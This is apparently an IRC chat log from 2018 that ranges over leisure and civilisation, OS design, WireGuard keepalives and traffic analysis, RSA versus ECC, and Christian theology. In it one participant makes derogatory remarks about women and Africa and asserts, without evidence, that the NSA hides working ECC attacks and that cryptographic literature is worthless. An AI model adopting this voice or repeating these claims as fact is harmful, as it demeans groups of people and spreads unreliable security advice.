has perfected the shit sandwich to the point nobody is ever hungry. as a result... http://btcbase.org/log/2018-04-13#1798480 1799818;1523889673;a111;Logged on 2018-04-13 20:37 zx2c4: i'm not saying everyone with leisure _does_ do something worthwhile with it. but you cant deny that leisure is in many cases a necessary precondition for many great aspects of civilization 1799819;1523889697;mircea_popescu;leisure is a precondition for the many aspect of civilisation whereby woman sits on ass all day yakking annoyingly. 1799820;1523889709;ascii_lander;depends whose leisure, neh 1799821;1523889710;mircea_popescu;which is generally what is meant by "africa", also. 1799822;1523889741;mircea_popescu;ascii_lander, there has yet not existed such a system where the top wasn't leisurely. the "leisure / no leisure" discussion contrasts "leisure for all" with "leisure for some" 1799823;1523889752;ascii_lander;'for all' is a lolscam 1799824;1523889768;mircea_popescu;it's the "tourism" "modern democracy" etc idiocy. 1799825;1523889804;mircea_popescu;"tourism" you know. as if that fucking counts as travel. "totally not brownstone tenement sir" british houses consisting of 1.7 sq ft of garden in front, and "bbq space" behind. 1799826;1523889807;mircea_popescu;and so following. 1799827;1523889816;ascii_lander;speaking of 'for all', i saw (on 2 consec. days!) a sight that must be seen to be believed : 500+ gurlz standing in line. for what? for 'starbucks' 1799828;1523889835;mircea_popescu;nah. the line really was for whitehoorse riding prince charmings. 1799829;1523889847;ascii_lander;these live in 'starbux'? 1799830;1523889850;mircea_popescu;they put pegasus turds in those cups didn';t you know. 1799831;1523889854;ascii_lander;apparently! 1799832;1523889872;ascii_lander;can't think of why else. couldn't be for the burned old tyre they serve as 'coffee' 1799833;1523889916;mircea_popescu;http://btcbase.org/log/2018-04-16#1799724 << this is the equivalent of "designing" a caveroom. tell you what : if your approach is substractive, no systems engineering took place. the guy hacking a motorcycle out of two broken cars isn't an industrialist, he's a scavenger. these are fundamentally, and radically, different things. 1799834;1523889916;a111;Logged on 2018-04-16 10:05 spyked: then moving from this approach you can systematically eliminate e.g. "pdf library" or e.g. "udev" or e.g. "protected mode" or everything else that is not *needed* for the system, not just userland (if there should be anything such as "a userland" at all in there) 1799835;1523889955;mircea_popescu;as a matter of fact, there's no design in cave rooms : you will dig where the soil [read: resistence of the medium] permits you to dig, and that is all. 1799836;1523889978;ascii_lander;mircea_popescu: 1 problem with 'modern' industry is that virtually every design includes elements of 'hack old cars that were ~given~ into new motorcycle' 1799837;1523890007;mircea_popescu;buildings, however, are a very opposite attempt : the dismal resistance of air (and see also un prophete discussion of winds here) and the minimal and well understood constraint of gravity allow enough free space for design to be a thing. 1799838;1523890022;mircea_popescu;ascii_lander, this is not a problem with modern industry as much as it's a problem with the EXTREME cognitive cost of design. 1799839;1523890048;ascii_lander;moar with economy of scale (e.g. the impracticality of rolling out a new IC for every new thing) 1799840;1523890191;mircea_popescu;and let's reintroduce the http://trilema.com/technology-and-governance discussion here as well. 1799841;1523890230;ascii_lander;oh hey BB is here 1799842;1523890230;ascii_lander;bbl 1799843;1523890285;mircea_popescu;http://btcbase.org/log/2018-04-16#1799742 << you don't have to try. with the company you keep, it does itself. 1799844;1523890285;a111;Logged on 2018-04-16 14:06 danielpbarron: got a message from my former employer that they "Have a service" and were notified of my blog post. hows that for seo? i'm not even trying to game the search 1799845;1523890292;mircea_popescu;the signal is indeed VERY strong from these parts. 1799846;1523890357;mircea_popescu;ftr, i thought your post was quite elegant, 99% of bloggers, begginner or otherwise, would have fallen into the ditch of "oh, i r allmighty powerful deity, i crush your companee!!!" nonsense. 1799847;1523890375;mircea_popescu;aaaand omfg, caught up with the logs! that... was painless. 1799848;1523891066;spyked;http://btcbase.org/log/2018-04-16#1799833 <-- but! the a, b examples I gave were *not* in any sense subtractive, read again. and by "eliminate" I mean, the words from vocabulary, unlearn them, throw to trash bin (hence "systematically"!), *not* "take monolith and prod it with toothpick" 1799849;1523891066;a111;Logged on 2018-04-16 14:45 mircea_popescu: http://btcbase.org/log/2018-04-16#1799724 << this is the equivalent of "designing" a caveroom. tell you what : if your approach is substractive, no systems engineering took place. the guy hacking a motorcycle out of two broken cars isn't an industrialist, he's a scavenger. these are fundamentally, and radically, different things. 1799850;1523891075;danielpbarron;i still like them. wasn't trying to do harm with the post. it was my intention to move on after that season, just didn't think it'd get cut short is all 1799851;1523891302;spyked;in fact 90% of blogpost was purely a discussion on terminology. eliminate "general purpose os" from head and you're left only with means to create a sane system. 1799852;1523891731;danielpbarron;lemme know when's a good time to do the atruechurch Q&A 1799853;1523891900;mircea_popescu;spyked, i don't see how this distinction works. what does "eliminate word from vocabulary" even mean, you'll take out some classes/dependencies/whatever out of a pile of lines of code, leaving a them-shaped hole behind. 1799854;1523891921;mircea_popescu;danielpbarron, indeed. hey, purity is a great boon for blogging. 1799855;1523891944;mircea_popescu;danielpbarron, now'd be great. 1799856;1523891965;mircea_popescu;spyked, i disagree general purpose os is actually a null concept, or a useless one. 1799857;1523892035;mircea_popescu;the best example i can think of is the code on the old handheld calculators. THAT is a general purpose os : it makes no assumption about the downstream, merely fully, cleanly and directly exposes the hardware. 1799858;1523892042;mircea_popescu;then they moved to a non-general purpose os, and alf threw a fit because the thing took time to boot or w/e. 1799859;1523892132;zx2c4;mircea_popescu: could you elaborate your argument on why you think the 0 response is different from the 16, 32, 48, etc response? spare me the hand-wavy "its always an invariant!" arguments. can you give some real security analysis of what you have in mind? am willing to take your concern seriously if theres a good case for it 1799860;1523892158;mircea_popescu;i suppose at work might be a confusion between what-some-idiots-might-be-thinking-retroconstructed-on-the-flimsy-basis-of-how-they-behave, where "general purpose os" means "the sprinkle of magic turning the computer from a computer to anything i want it to be, which is to say a tool that magicvally works for any purpose i might come up with, especially the nonsensical and self-contradictory ones". 1799861;1523892166;mircea_popescu;whereas the proper definition of "general purpose" is the one mentioned, "which makes no assumptions about the userland". 1799862;1523892186;zx2c4;these are broad and hand-wavy. im trying to find some real meat here to analyse 1799863;1523892192;mircea_popescu;zx2c4, yes. 1799864;1523892259;mircea_popescu;if i have a message, which is not null, i can package that message in any string of any arbitrary sized chunklets. so your observing 8+16+24+8+8 does not tell you whether you observed 5 null messages, or a 64 message, or 4 16s, or anything else. 1799865;1523892282;mircea_popescu;multiple things sum to any integer larger than 0. 1799866;1523892284;danielpbarron;!!up Darwin_Fish 1799867;1523892285;deedbot;Darwin_Fish voiced for 30 minutes. 1799868;1523892298;mircea_popescu;NOTHING however sums to 0, not in reality, becasuse there's no negative integers in reality. 1799869;1523892308;mircea_popescu;zx2c4, does that work ? 1799870;1523892311;mircea_popescu;hi there Darwin_Fish 1799871;1523892326;Darwin_Fish;hello 1799872;1523892332;mircea_popescu;ever been on irc before ? 1799873;1523892337;Darwin_Fish;no 1799874;1523892352;Darwin_Fish;never done much online like this 1799875;1523892354;mircea_popescu;do you know about rsa and cryptography and so on ? 1799876;1523892371;Darwin_Fish;a little from daniel 1799877;1523892426;mircea_popescu;i'll propose something to you : inasmuch as one is in a better position understanding god for god, rather than understanding god for what some guy said, cryptography is the most direct path to divinity. 1799878;1523892471;Darwin_Fish;i didn't know cryptography was a religion 1799879;1523892476;zx2c4;mircea_popescu: im trying to apply what you said to IP 1799880;1523892508;mircea_popescu;but we're discussing theology not religion. cryptography is eminently not a religion. in fact, i'm the frirst one to have ever said anything remotely like the foregoing, and it's giving crypto people hives just reading it. 1799881;1523892512;mircea_popescu;zx2c4, go ahead. 1799882;1523892593;Darwin_Fish;what's the difference between theology and religion? 1799883;1523892634;mircea_popescu;Darwin_Fish, you ever heard that quip, that "in theory, there's no difference between theory and practice ; in practice, there is" ? "theologically, there's no difference between theology and religion. but religiously..." 1799884;1523892696;Darwin_Fish;sorry, don't follow the logic. If there is no difference, what's the difference. 1799885;1523892710;Darwin_Fish;? 1799886;1523892720;mircea_popescu;well, have you ever met a religious dude who didn't SAY, and broadly think, they're following god ? 1799887;1523892753;mircea_popescu;they all say it. but do they really ? so what's the difference! 1799888;1523892828;Darwin_Fish;I consider an atheist religious. But, of course there are plenty of people who say and don't do 1799889;1523892859;mircea_popescu;right. 1799890;1523892873;Darwin_Fish;By the way, God doesn't believe in atheists 1799891;1523892886;mircea_popescu;hehe, i might've read that somewhere. 1799892;1523892899;Darwin_Fish;Romans 1:18-32 1799893;1523892910;mircea_popescu;danielpbarron, how did that work, 1799894;1523892917;zx2c4;mircea_popescu: let's take a protocol that just encrypts ip packets and nothing more. traffic analysis of the size of packets gives you something, especially in the case of TCP where there are necessary types of responses at various points. but i suppose you want me to consider "general purpose cases". so im thinking about a raw UDP protocol. in this case, it might be that at the end of an exchange, one side has nothing more to say, and so it says 1799895;1523892917;zx2c4;nothing. alternatively, it sends a bunch of garbage data at random points to trip up traffic analysis. now introduce the wireguard final-confirmation keepalive. one side has nothing more to say, yet it just now received a message from the other side. rather than sending nothing, wireguard now sends a single length 0 message. after that, both sides are entirely silent. what does the sending of that length 0 message reveal that sending nothing would 1799896;1523892917;zx2c4;not reveal? 1799897;1523892930;danielpbarron;!~bible rom 1:18-32 1799898;1523892931;jhvh1;danielpbarron: [KJV] Romans 1:18 :: For the wrath of God is revealed from heaven against all ungodliness and unrighteousness of men, who hold the truth in unrighteousness; 1799899;1523892933;jhvh1;danielpbarron: [KJV] Romans 1:19 :: Because that which may be known of God is manifest in them; for God hath shewed it unto them. 1799900;1523892934;jhvh1;danielpbarron: [KJV] Romans 1:20 :: For the invisible things of him from the creation of the world are clearly seen, being understood by the things that are made, even his eternal power and Godhead; so that they are without excuse: 1799901;1523892934;jhvh1;danielpbarron: [KJV] Romans 1:21 :: Because that, when they knew God, they glorified him not as God, neither were thankful; but became vain in their imaginations, and their foolish heart was darkened. 1799902;1523892936;jhvh1;danielpbarron: [KJV] Romans 1:22 :: Professing themselves to be wise, they became fools, 1799903;1523892937;jhvh1;danielpbarron: ERROR: I have more than 5 matching passages from your query (10 left). Please be more specific. 1799904;1523892945;mircea_popescu;shinohai, one line only!!1 1799905;1523893005;mircea_popescu;zx2c4, but the option isn't exactly "send nothing or send 0 length message". the option is "send nothing / zero length message OR send the time". 1799906;1523893047;zx2c4;the time? 1799907;1523893058;Darwin_Fish;For since the creation of the world His invisible attributes are clearly seen, being understood by the things that are made, even His eternal power and Godhead, so that they are without excuse, (Rom 1:20 NKJ) 1799908;1523893061;mircea_popescu;Darwin_Fish, anyway, theology is the study of divinity as a theoretical possibility ; religion is the study of historical human practice. the catholics resolve this problem by claiming (falsely) that they were specifically promised god will preserve their religion in theology. this claim has all the strength of their claim constantine deeded them the world. 1799909;1523893081;mircea_popescu;zx2c4, some random 8 byte string or whatever. 1799910;1523893129;Darwin_Fish;I ok, I understand your distinction now 1799911;1523893199;Darwin_Fish;I often refer to religion as you described it 1799912;1523893204;mircea_popescu;Darwin_Fish, good. so what would you say is the fundamental thing in children that eventually, but necessarily, leads them to at the very least question the possibility of divinity, if not outright seek it ? 1799913;1523893241;Darwin_Fish;That was the true Light which gives light to every man coming into the world. (Joh 1:9 NKJ) 1799914;1523893249;mircea_popescu;yes, but i mean in practical terms. 1799915;1523893273;Darwin_Fish;God makes Himself known to every human on the planet 1799916;1523893281;Darwin_Fish;in their hearts 1799917;1523893292;Darwin_Fish;You don't have to have a Bible 1799918;1523893313;mircea_popescu;yes. but i propose to you the instrument thereby is the infantile tendency to question "why ?". that's what they fucking do, all day long, at least the brighter ones. 1799919;1523893314;Darwin_Fish;to know some of the concepts therein 1799920;1523893338;mircea_popescu;eventually they give up, mostly because adults are TERRIBLE at answering why ; and also because they get distraught, and the children dun wanna bother them. so it gets rubbed out. 1799921;1523893344;mircea_popescu;nevertheless... without the why... 1799922;1523893346;Darwin_Fish;oh yes, God has made children inquisitive 1799923;1523893347;trinque;"knock and the door shall be opened" eh? 1799924;1523893358;*;trinque dusts off the cobwebs in that wing of his skull 1799925;1523893381;mircea_popescu;Darwin_Fish, and that is the substance of my proposition earlier. there is no place known to me where the most refined and annoying whys can be stated quite like in this field. 1799926;1523893385;zx2c4;mircea_popescu: if what you mean is rather than sending an empty packet, i should instead rand(20,200) zero bytes encrypted, then i wonder what this would accomplish. the other side now receives this. if it's a keepalive message (which it knows after decryption), then it goes silent. if it's not, then it either responds with whatever is appropriate to respond to that, or if it has nothing to say, it would have to send a keepalive too. in 1799927;1523893385;zx2c4;otherwords, an attacker still knows that the protocol has gone silent, because one side will stop responding. it sounds to me like what you would prefer is for both sides always to be talking and chatting -- always, and with garbage when not with real data -- to trip of traffic analysis. that's a legitimate desire, and there are many other additional things can add to protocols to further trip up traffic analysis. wireguard distinctly isn't focused 1799928;1523893385;zx2c4;on that, instead preferring to be "stealthy" and "silent" when not in use. this naturally reveals when communications happen, but it also makes the endpoints undiscoverable when theyre not talking. also, it'd be easy to build that kind of 'always chatting' logic into whatever specific application you need to conceal. or, alternatively, simply write an additional utility that sits on top of wireguard that sends junk back and forth at quasi random 1799929;1523893385;zx2c4;intervals relative to the amount of existing traffic. i wouldnt be surprised if something like this already exists. 1799930;1523893389;mircea_popescu;WHY the fuck does rsa even work >: 1799931;1523893412;mircea_popescu;zx2c4, i don't mean random (20,200). i just mean, the size of your smallest non-zero packet. was it 8 or what was it ? 1799932;1523893446;Darwin_Fish;It takes patience to answer why repeatedly. It also takes understanding, which most people don't have 1799933;1523893459;mircea_popescu;zx2c4, so is your idea that basically this should be handled by the app importing your lib, rather than the lib itself, more flexibility this way ? 1799934;1523893466;Darwin_Fish;Because, if you keep asking why, it always leads to God 1799935;1523893480;mircea_popescu;Darwin_Fish, quite, "why ?" is an escalator, every successive why needs exponentially more resources to answer. 1799936;1523893496;Darwin_Fish;Correct 1799937;1523893509;Darwin_Fish;That's why it always leads to God 1799938;1523893519;zx2c4;mircea_popescu: re:rand(20,200) - sorry. random number of bytes is all i was going for. (an ip header is 20 bytes, so you'd probably want to bound it at that. and 200 seems like a reasonable cut off. but of course we could keep engineering and designing that sort of thing and come up with different numbers.) 1799939;1523893521;Darwin_Fish;He is the answer to every why 1799940;1523893540;Darwin_Fish;For by Him all things were created that are in heaven and that are on earth, visible and invisible, whether thrones or dominions or principalities or powers. All things were created through Him and for Him. (Col 1:16 NKJ) 1799941;1523893553;mircea_popescu;Darwin_Fish, check it out, agreement and harmony. now satisfy my curiosity : what happened with al soto ? 1799942;1523893570;Darwin_Fish;upholding all things by the word of His power, (Heb 1:3 NKJ) 1799943;1523893586;mircea_popescu;zx2c4, honestly, i'm satisfied with this for an answer "look, wireguard can be used many ways, nothing wrong with your way, and it's supported, but in general other people want other things and so there it is". 1799944;1523893596;zx2c4;mircea_popescu: wireguard isnt a library. its a virtual network interface that tunnels ip packets. what im pointing out is that your suggestion implies that both sides must _keep_ talking always, since thats the only way to obscure termination messages. 1799945;1523893602;Darwin_Fish;For of Him and through Him and to Him are all things, to whom be glory forever. (Rom 11:36 NKJ) 1799946;1523893631;mircea_popescu;zx2c4, yeah. have you seen anything re gossipd, ~speaking the tmsr-wireguard ? 1799947;1523893645;Darwin_Fish;But now I have written to you not to keep company with anyone named a brother, who is sexually immoral, or covetous, or an idolater, or a reviler, or a drunkard, or an extortioner-- not even to eat with such a person. (1Co 5:11 NKJ) 1799948;1523893654;Darwin_Fish;He was a covetous man 1799949;1523893660;zx2c4;mircea_popescu: and i think having that kind of thing always on -- constant chattiness -- would be a security step backwards, since it'd give up stealthiness. but of course if you still wanted it for a special use case, there's nothing in wireguard preventing you from having it pretty easily 1799950;1523893664;mircea_popescu;Darwin_Fish, that doesn't tell me much, does it ? 1799951;1523893670;zx2c4;(or even general purpose utilities that could ostensibly work over any link) 1799952;1523893673;mircea_popescu;zx2c4, aha. 1799953;1523893715;zx2c4;tmsr? gossipd? 1799954;1523893718;Darwin_Fish;He couldn't stop spending money he shouldn't be spending (i.e. creating debt) 1799955;1523893745;Darwin_Fish;Let your conduct be without covetousness; be content with such things as you have. (Heb 13:5 NKJ) 1799956;1523893760;mircea_popescu;zx2c4, tmsr, the most serene republic, this thing. gossipd, lessee.... there's http://trilema.com/2016/gossipd-design-document/ and http://btcbase.org/log-search?q=gossipd and not much else. it's vaporware for now. 1799957;1523893775;Darwin_Fish;Owe no one anything except to love one another, (Rom 13:8 NKJ) 1799958;1523893792;zx2c4;oh, the most serene acronym, shoulda known 1799959;1523893793;mircea_popescu;Darwin_Fish, so basically he ran up the church / your ccs, and eventually it had to come to an end ? 1799960;1523893829;Darwin_Fish;No, he was spending his money 1799961;1523893848;Darwin_Fish;but creating debt, at least in his own mind 1799962;1523893853;mircea_popescu;zx2c4, the idea being that the "wtf are you going to do, keep talking forever with anyone you ever talk to ?! morons!" problem is not unknown, but a major item giving me a bellyache as it stands now. invariants, god damn them all. 1799963;1523893865;mircea_popescu;Darwin_Fish, how does that work though ? i mean... 1799964;1523893866;Darwin_Fish;He thought he was going to owe the gov thousands of dollars 1799965;1523893876;Darwin_Fish;but kept spending money 1799966;1523893885;Darwin_Fish;thus "creating" debt to the gov 1799967;1523893890;mircea_popescu;but how do you know what he thought ? "the devil himself knows not the tought of man" etc. 1799968;1523893900;Darwin_Fish;he told us 1799969;1523893901;zx2c4;mircea_popescu: the more interesting approach to foiling that kind of traffic analysis is the general topic of mixnets 1799970;1523893914;mircea_popescu;zx2c4, i suspect you're right. 1799971;1523893923;zx2c4;always swirling data around, so not only do you not know who's talking when, but you don't know who's talking to whom 1799972;1523893927;Darwin_Fish;He knew about it for months 1799973;1523893927;mircea_popescu;Darwin_Fish, maybe he was confused. 1799974;1523893940;Darwin_Fish;He was actually incorrect 1799975;1523893957;Darwin_Fish;He actually didn't end up owing anything, so he said later 1799976;1523893963;mircea_popescu;Darwin_Fish, isn't it silly, to ruin a long standing relationship like that, over what was in the end a small error ? 1799977;1523894015;Darwin_Fish;I had hoped to bring him back in the church, but now he hates my guts 1799978;1523894040;Darwin_Fish;He faults me for being involved in the Ron Paul movement 1799979;1523894058;Darwin_Fish;Which fault I agree with, in part 1799980;1523894072;zx2c4;> For a functional example consider node A, whose "encryption" mechanism consists of sha256(string+"hurr"), and node B, whose encryption mechanism consists of sha256("durr"+string.). 1799981;1523894072;zx2c4;sha256 isnt an encryption function. also beware this construction, especially the second one where the string comes last -- length extension is a problem with sha2 1799982;1523894079;mircea_popescu;Darwin_Fish, tell me about that ? 1799983;1523894081;zx2c4;(quoted from your link) 1799984;1523894091;mircea_popescu;zx2c4, was just an example. 1799985;1523894094;mircea_popescu;!!up Darwin_Fish 1799986;1523894095;deedbot;Darwin_Fish voiced for 30 minutes. 1799987;1523894107;mircea_popescu;zx2c4, given like that for the sake of ready computability, see. nothing more. 1799988;1523894111;Darwin_Fish;Ron Paul believes prostitution should be legal. I turned a blind eye to that, but I should not have 1799989;1523894113;zx2c4;ah 1799990;1523894127;mircea_popescu;Darwin_Fish, prostitution is legal here (costa rica). are they all going to hell ? 1799991;1523894129;zx2c4;mircea_popescu: im curious -- why are you so bent on RSA? ECC has been around for quite some time now and has numerous advantages 1799992;1523894129;Darwin_Fish;at least in my own conscience 1799993;1523894146;Darwin_Fish;I would not condemn someone else it 1799994;1523894146;mircea_popescu;zx2c4, i don't buy into the advantages. 1799995;1523894152;Darwin_Fish;for it 1799996;1523894162;mircea_popescu;Darwin_Fish, what is the problem with prostitution ? 1799997;1523894176;Darwin_Fish;Everyone who practices prostitution and does not repent, yes 1799998;1523894189;mircea_popescu;the whores ~and~ the johns ? 1799999;1523894206;Darwin_Fish;Do not prostitute your daughter, to cause her to be a harlot, lest the land fall into harlotry, and the land become full of wickedness. (Lev 19:29 NKJ) 1800000;1523894241;zx2c4;all of them? some of the advantages are indisputable like key size and computation speed and implementation ease. im guessing you dont believe there's a security advantage over RSA? you're not soothed by the fact that many attacks against RSA dont work with ECC? okay, but that still doesn't discredit the indisputable advantages. so then maybe your position is that ECC has _weaker_ security than RSA for various reasons? that'd be a more interesting 1800001;1523894242;zx2c4;claim, if that's the one you're implying 1800002;1523894280;Darwin_Fish;Yes, But the cowardly, unbelieving, abominable, murderers, sexually immoral, sorcerers, idolaters, and all liars shall have their part in the lake which burns with fire and brimstone, which is the second death." (Rev 21:8 NKJ) 1800003;1523894280;mircea_popescu;zx2c4, no, they're fucking disputable. you're going to tell me you get "the same thing" but "with a smaller key" ? i'm tuning out, this is nonsense. 1800004;1523894309;Darwin_Fish;That is sexual immorality 1800005;1523894324;mircea_popescu;zx2c4, the only thing you can get with a smaller key is "something just as good", in the sense mcdonalds is just as good as the restaurant i go to. perhaps it is -- for the poor. i'm not poor, nor do i orient my life around the needs of the needy. 1800006;1523894333;Darwin_Fish;God makes the rules. 1800007;1523894350;mircea_popescu;Darwin_Fish, but is it immoral for both the harlot and the guy paying her ? 1800008;1523894358;Darwin_Fish;Yes 1800009;1523894386;mircea_popescu;but... listen. isn't this the whole entire proposition of manhood, both biologically and socio-historically, "go ye and make a pile of resources so females may be attracted thereby" ? 1800010;1523894396;mircea_popescu;and not just human manhood, at that, ~all species. 1800011;1523894402;Darwin_Fish;Do you not know that your bodies are members of Christ? Shall I then take the members of Christ and make them members of a harlot? Certainly not! 1800012;1523894402;Darwin_Fish; 16 Or do you not know that he who is joined to a harlot is one body with her? For "the two," He says, "shall become one flesh." 1800013;1523894402;Darwin_Fish; 17 But he who is joined to the Lord is one spirit with Him. 1800014;1523894402;Darwin_Fish; 18 Flee sexual immorality. (1Co 6:15-18 NKJ) 1800015;1523894408;zx2c4;mircea_popescu: the keys in ECC are smaller. if your position is that this cant possibly mean it's more secure than RSA, then i suppose the actual claim you're making is that 'ECC with ECC-sized keys is less secure than RSA with RSA-sized keys'. what's the basis for this? 1800016;1523894463;mircea_popescu;zx2c4, i proposition that the smaller the key, the smaller the key. this can't be meaningless. 1800017;1523894481;Darwin_Fish;Not sure if I understand your question 1800018;1523894484;Darwin_Fish;sorry 1800019;1523894498;mircea_popescu;my budget for a key happens to be 4096 bits. it makes 0 difference to me that there's a cheaper provider offering 16 bit keys. everyone offering a key under 4096 bits is par for this test. 1800020;1523894506;mircea_popescu;Darwin_Fish, well, which part of it ? 1800021;1523894580;Darwin_Fish;If I understand your question, the answer is no. This is God's purpose: And He has made from one blood every nation of men to dwell on all the face of the earth, and has determined their preappointed times and the boundaries of their dwellings, 1800022;1523894581;Darwin_Fish; 27 "so that they should seek the Lord, in the hope that they might grope for Him and find Him, though He is not far from each one of us; 1800023;1523894581;Darwin_Fish; 28 "for in Him we live and move and have our being, (Act 17:26-28 NKJ) 1800024;1523894585;mircea_popescu;zx2c4, and the "that many attacks against RSA dont work with ECC" claim is especially odious, as it comes from a single source, which is a criminal org with a history of manipulatively lying. what happens is that usg publishes every ~useless "attack" on rsa and withholds the few ~working~ attacks on ecc from publishing. then you get this situation where seemingly, for the very naive surface-seekers, "ecc has advantages". it h 1800025;1523894585;mircea_popescu;as no advantage. 1800026;1523894597;mircea_popescu;Darwin_Fish, is not man made for work ? 1800027;1523894611;Darwin_Fish;Word is part of the curse, Gen 3 1800028;1523894620;Darwin_Fish;Work 1800029;1523894629;mircea_popescu;so work is a curse, and not substantial to mankind ? 1800030;1523894669;Darwin_Fish;Cursed is the ground for your sake; In toil you shall eat of it All the days of your life. 1800031;1523894669;Darwin_Fish; 18 Both thorns and thistles it shall bring forth for you, And you shall eat the herb of the field. 1800032;1523894669;Darwin_Fish; 19 In the sweat of your face you shall eat bread Till you return to the ground, For out of it you were taken; For dust you are, And to dust you shall return." 1800033;1523894669;Darwin_Fish; (Gen 3:17-19 NKJ) 1800034;1523894673;zx2c4;mircea_popescu: ahh that ignorant and antiquated notion, that "key size implies security size". or do you think there will be some amazing GNFS-like algorithms that come out for ECC, requiring ECC to use absurdly huge keys in the same way as RSA? 1800035;1523894681;Darwin_Fish;God uses our work to bless us 1800036;1523894705;mircea_popescu;zx2c4, looky, i get that i may seem retarded at times and in some lights, but it's not a safe assumption. 1800037;1523894710;Darwin_Fish;He who has a slack hand becomes poor, But the hand of the diligent makes rich. (Pro 10:4 NKJ) 1800038;1523894731;mircea_popescu;the algos for ecc will ~never come out, until the day i water my horse out of the repurposed washington monument, of course. 1800039;1523894750;zx2c4;mircea_popescu: i take it now that mostly you're skeptical because the nsa was pushing ecc in the early years, before everyone else woke up to it 1800040;1523894766;mircea_popescu;what is this "absurdly" large ? why is 4096 even large at all ? 1800041;1523894786;mircea_popescu;zx2c4, i am very skeptical because rsa they hated and ecc they pushed and then suddenly everyone forgot the 90s and is all onboard. 1800042;1523894803;mircea_popescu;how T?HE FUCK can you even look at anything nsa says other than "this is what the liars are pushing these days" ? hm ? 1800043;1523894825;Darwin_Fish;The rich and the poor have this in common, The LORD is the maker of them all. (Pro 22:2 NKJ) 1800044;1523894834;zx2c4;i think cloudflare has an ELI5 article from a few years back about "what all the key sizes doth mean" 1800045;1523894839;zx2c4;lemme see if im remembering correctly... 1800046;1523894844;mircea_popescu;Darwin_Fish, so you don't believe there's a sexual motivation in work ? 1800047;1523894847;zx2c4;mircea_popescu: https://blog.cloudflare.com/why-are-some-keys-small/ here we go 1800048;1523894855;mircea_popescu;oh, cloudflare! 1800049;1523894878;mircea_popescu;zx2c4, look, think of a number between 0 and 2, 0 and 2 exclusive. have you ? here i go, ima guess it! you thought of 1! 1800050;1523894888;mircea_popescu;wtf, i have to explain why short keys are shorter than longer keys ? 1800051;1523894920;Darwin_Fish;The person who labors, labors for himself, For his hungry mouth drives him on. (Pro 16:26 NKJ) 1800052;1523894939;mircea_popescu;the hungry mouth of the wife and the wails of starving children notwithstanding ? 1800053;1523895011;Darwin_Fish;No, a man can certainly be motivated by that 1800054;1523895015;mircea_popescu;zx2c4, understand, the expectation here isn't "longer, therefore better". the situation is as described above, my key budget is 4096 bits, both ecc and rsa are ok by this measure. 1800055;1523895023;mircea_popescu;Darwin_Fish, but is this motivation evil ? 1800056;1523895029;Darwin_Fish;No 1800057;1523895042;Darwin_Fish;the sexual drive is not evil 1800058;1523895043;mircea_popescu;so it is not evil for man to work so that a woman can eat ? 1800059;1523895052;Darwin_Fish;of course not 1800060;1523895057;zx2c4;mircea_popescu: so from your mention of "criminal org" it seems to me that your concern is not so much the mathematical issues that are discussed in the literature, but rather a particular history that to you indicates there must be secret attacks that only the select few geniuses at the nsa know about, and everybody pushing ecc is either in on the conspiracy or just dumber than the nsa geniuses. i guess you're entitled to this opinion -- what's 1800061;1523895057;zx2c4;one man's hunch vs another man's? but there has been a lot a lot a lot of open academic analysis on ecc for many years now and this alleged smoking gun still has not been found. so, meh. 1800062;1523895071;mircea_popescu;Darwin_Fish, so then what's the problem with whoredom. that they came up with their own arrangement, rather than using a wedding ? 1800063;1523895086;mircea_popescu;zx2c4, my concern is that the literature is entirely worthless. 1800064;1523895110;zx2c4;then crypto is doomed? 1800065;1523895114;Darwin_Fish;God says it's evil. That's all it ever comes down to 1800066;1523895117;mircea_popescu;which is possibly the one point where we mostly diverge in our priors, you look upon published extant cryptology as some kind of a scientific discipline, whereas to me it's ~gender studies for numbers. 1800067;1523895126;mircea_popescu;zx2c4, not doomed as long as the republic stands. 1800068;1523895130;Darwin_Fish;When you are discussing something being evil, it's always because God says so 1800069;1523895146;Darwin_Fish;Otherwise, there is no morality whatsoever 1800070;1523895146;mircea_popescu;Darwin_Fish, there's no deductive component in establishing what is evil ? 1800071;1523895162;Darwin_Fish;Nothing other than God declaring it is so 1800072;1523895186;mircea_popescu;Darwin_Fish, but your source for what god declared is a book which a guy wrote and some other guys maybe didn't alter (too much). 1800073;1523895196;Darwin_Fish;There is no absolute on morality accept God Himself 1800074;1523895210;Darwin_Fish;It was written by about 40 men 1800075;1523895224;Darwin_Fish;Via the Jews 1800076;1523895233;mircea_popescu;right. 1800077;1523895250;mircea_popescu;Darwin_Fish, i wonder, are you willing to read a story i wrote tell me what you think ? 1800078;1523895259;Darwin_Fish;Sure 1800079;1523895259;mircea_popescu;it's not terribly long. 1800080;1523895265;zx2c4;if secret government scientists are lightyears ahead of "entirely worthless" academics, and they have secret attacks on everything academia is currently okay with, then i guess it's game over, and we have to wait until we're at a ripe old age to read the history books on the secret mathematics of our present age. i dont really share this point of view though. and even aside from the factual validity of it, it doesn't seem like a psychologically 1800081;1523895265;zx2c4;healthy assumption to live by. so again, my response to that kind of thing is, "meh" 1800082;1523895275;mircea_popescu;Darwin_Fish, http://trilema.com/2015/the-rabbi-and-the-ewe/ 1800083;1523895292;mircea_popescu;zx2c4, they have no pill for rsa ; which is why the ecc behaviour. 1800084;1523895308;mircea_popescu;we're ok. the various fashionable webtards, i guess not so much. 1800085;1523895319;mircea_popescu;but then again, we're worth trillions, whereas webtards... not so much. 1800086;1523895331;mircea_popescu;which, if you think about it, explains the homeostasis observed quite well. 1800087;1523895355;zx2c4;your guess about secret government conspiracies is as good as mine? some people think they are vast; others think they are small. some think ecc; others think rsa; some think jfk; others think apollo. ... 1800088;1523895393;mircea_popescu;right. 1800089;1523895419;mircea_popescu;http://btcbase.org/log/2017-08-28#1704268 1800090;1523895419;a111;Logged on 2017-08-28 23:10 mircea_popescu: kanzure " Obviously there is no possiblity of meaning outside of a structure of authority, and the authority can not be predicated on the meaning." 1800091;1523895438;mircea_popescu;so no, my guess is not as good as yours. i can speak ex cathedra. 1800092;1523895526;zx2c4;* shrug * 1800093;1523895553;mircea_popescu;this is where all that "how the wot works" thing is referenced again. 1800094;1523895588;mircea_popescu;man acting alone is stuck with these "oh, a conclave of idiots bent on self preservation and avoiding the lowly station their idiocy warrants them holds all the power, and i'll act as man alone confronted by governemnt". 1800095;1523895597;mircea_popescu;whereas terrorist org couldn't give less of a shit about a weaker other org. 1800096;1523895619;mircea_popescu;and so no, i'm not in this position of haplessly, helplessly poking at the great-mystery 1800097;1523895724;Darwin_Fish;It reminds me of Job 12 1800098;1523895728;Darwin_Fish;7 "But now ask the beasts, and they will teach you; And the birds of the air, and they will tell you; 1800099;1523895728;Darwin_Fish; 8 Or speak to the earth, and it will teach you; And the fish of the sea will explain to 